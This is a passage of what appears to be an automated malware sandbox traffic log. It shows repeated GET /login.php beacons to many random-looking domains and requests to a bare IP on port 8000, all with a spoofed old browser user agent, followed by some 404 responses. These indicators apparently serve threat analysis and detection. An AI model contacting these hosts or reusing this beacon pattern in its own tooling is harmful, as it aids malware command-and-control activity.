    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-1952-9852-0a12b0cc4551 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-1952-8ae5-52e851fd8a3a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731346399.2937263
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731346399.8350699
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: btst=70bac528d3e702c5102aff809e6181c6|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: btst=fc1b6c412396387aa1fbc86a7deece62|66.23.206.109|1731346388|1731346388|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: btst=4492d185efa1732c70e907a3d04910b3|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: btst=e8a049cc40d6b9d00effb9629f14927b|66.23.206.109|1731346389|1731346389|0|1|0; snkz=66.23.206.109
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478891988923922560
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge6GOPmFxSV%2B%2BT1%2BTIQRK%2FQnxWhDhab5m1AReH97BZwIblOhjTwPxAQzqDYJi5Ikbxcxs638E8NKaGwhpmfZYd6iogWjk3EkTy5J3c4C7O9n1zIcGr9RLqJ5P%2F9thA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006993f408c7b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1327&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=abb06ee54315933e&ts=1213&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1ljoVH9newXjkKfzem65efiD7VUtVQw%2FbOPYzPLMdSt23kXzF%2FtbIgmKTCAc5%2Byf7BXJTWTusSUla5Suuip030zDj1RXhKv3Hve%2FWLL8GYkQN466CylAvuCXjqaMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006a3fc2372aa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=1353271&cwnd=239&unsent_bytes=0&cid=92f444a8342b0a08&ts=746&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="46.0",amp_style_sanitizer;dur="22.9",amp_tag_and_attribute_sanitizer;dur="17.1",amp_optimizer;dur="18.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qLq82wRQNVpIHvzacho9ZxSgg61RbCRLrnTeOQFqm3ggFGC6zAzXo5Z91YrbZjKk1%2F55pZj1u%2FKvqZse03KhvuTA2iIoxJCOfALMc75RcMNLtEmy8jq8TdZ0U5S03A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006b5795cafac-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=155429&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18630&cwnd=32&unsent_bytes=0&cid=61270023507c636c&ts=1428&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="44.3",amp_style_sanitizer;dur="19.1",amp_tag_and_attribute_sanitizer;dur="21.1",amp_optimizer;dur="17.8"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMcpETkdI4nHjMXP%2FDrmQ5ifVjoPo%2F4xu2h4eC7%2B%2BAUvCToUV7HDPEkjlYWIsOmH%2FDbm%2BZDAVaxbrSlCoqfbVpUH7yR5xNh8fK5C4gMh4QOY39eAMnLSoWfelsnZeQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1006c97f804328-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2505190&cwnd=251&unsent_bytes=0&cid=bb0cb41164c0613d&ts=1421&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1p%2B3ek1m0cURCHenj1AiLsqvqVr%2Fh9sYjBQZbwcDOBqNdCTjR4bM1A0rYn%2B0OflXLyqGbNEBploXXZgeuX3zmF3k6AH%2FFyuMFRDMMnMHomnEhaiX%2FRUXpstnuAfuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e100739b8c80cac-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=249&unsent_bytes=0&cid=90ed1645990d313e&ts=995&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:33:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4XVVDvfTPVq9kVwA2OMG%2BQ7Wh3RxUu2n%2Fnbe1UvtKCbBUx%2BycbYrOslijTCCN3neabQx%2Bgsdwp5E1pi3VO15D5iIq8u4l1PduUpkkRrbWxnG5ImqbjDfH3mpBVGAjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e100744191c1921-EWRalt-svc: h3=":443"; ma=86400server-timing: 